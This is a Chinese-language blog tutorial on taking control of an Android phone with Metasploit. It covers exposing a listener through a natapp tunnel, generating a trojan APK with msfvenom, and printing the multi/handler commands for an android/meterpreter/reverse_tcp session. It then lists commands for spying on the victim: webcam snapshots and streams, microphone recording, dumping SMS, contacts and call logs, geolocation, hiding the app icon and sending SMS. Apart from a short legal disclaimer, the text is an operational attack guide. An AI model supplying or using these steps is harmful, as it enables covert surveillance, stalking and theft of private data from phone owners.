Metasploit之渗透Android手机

【温馨提示】:
所有有关安全入侵防范知识仅供自己参考学习,未经别人允许入侵别人系统是违法的!

准备条件:

natapp Android手机一部
kali操作系统 ip:192.168.43.18

一、实现内网穿透

1.1 进入https://natapp.cn/,根据提示注册并创建隧道

Metasploit之渗透Android手机_第1张图片

1.2 进入https://natapp.cn/#download下载linux客户端natapp

Metasploit之渗透Android手机_第2张图片

1.3 命令行内启动natapp

这里写图片描述
#####4.ping server.natappfree.cc得到服务器ip,和端口号:45914
Metasploit之渗透Android手机_第3张图片
二、Metesploit木马入侵
2.1 打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件(生成apk木马程序)
Metasploit之渗透Android手机_第4张图片

*LHOST:本机IP
*LPORT:上面的得到的端口
*/keivn/test.apk(追加到指定的路径生成test.apk文件)

2.2 将木马安装到手机上(我直接用自己手机测试学习)

安装完手机上有个MainActivity软件

2.3 启动msf,msfconsole输入命令:

msf> use exploit/multi/handler	//加载模块
msf> set payload android/meterpreter/reverse_tcp	//选择Payload
#修改Ip和端口
msf> set LHOST 192.168.43.18		//Ip设置为natapp中配置的本机ip
msf> set LPORT 45914				//端口设置为natapp中配置的本地端口	
msf> exploit	   //开始监听,等待木马相应

Metasploit之渗透Android手机_第5张图片
2.4 接下来是一些常用命令

Stdapi: Webcam Commands
===================================
	webcam_list  列出网络摄像头
	record_mic [ˈrekərd]/记录/  从默认麦克风录制音频为X秒
	webcam_chat  开始视频聊天
	webcam_snap  从指定的摄像头获取快照
	webcam_stream -i 1  从指定的网络摄像头播放视频流[选择后摄像头]

Android Commands
=================
	activity_start  从URI字符串启动Android活动
	check_root  检查设备是否有根
	dump_calllog  获取调用日志
	dump_contacts  获取联系人列表
	dump_sms  获取短信
	geolocate  利用地理定位获取当前LAT
	wlan_geolocate  利用WLAN信息获取当前LAT
	hide_app_icon  从发射器隐藏应用程序图标
	interval_collect  管理区间收集能力
	send_sms  从目标会话发送短消息
	set_audio_mode 
	sqlite_query  从存储库查询SQLite数据库
	wakelock  启用/禁用Wakelock
	

你可能感兴趣的:(网络安全)